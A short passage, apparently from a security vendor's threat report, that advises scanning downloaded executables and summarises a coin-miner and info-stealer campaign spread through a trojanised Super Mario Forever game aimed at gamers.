  • Always scan any downloaded executables with your antivirus software before launching them and ensure that your security tools are up-to-date.

The gaming community’s large and interlinked user base is a prime target for malicious activities by TAs. One such activity is a coin-miner malware campaign that uses the Super Mario Forever game to target gamers using high-performance computers. This malware also has a component that steals sensitive information from the victims’ systems, resulting in financial losses and a significant decrease in system performance and resources. As a result, individuals and organizations face significant disruptions in their productivity.
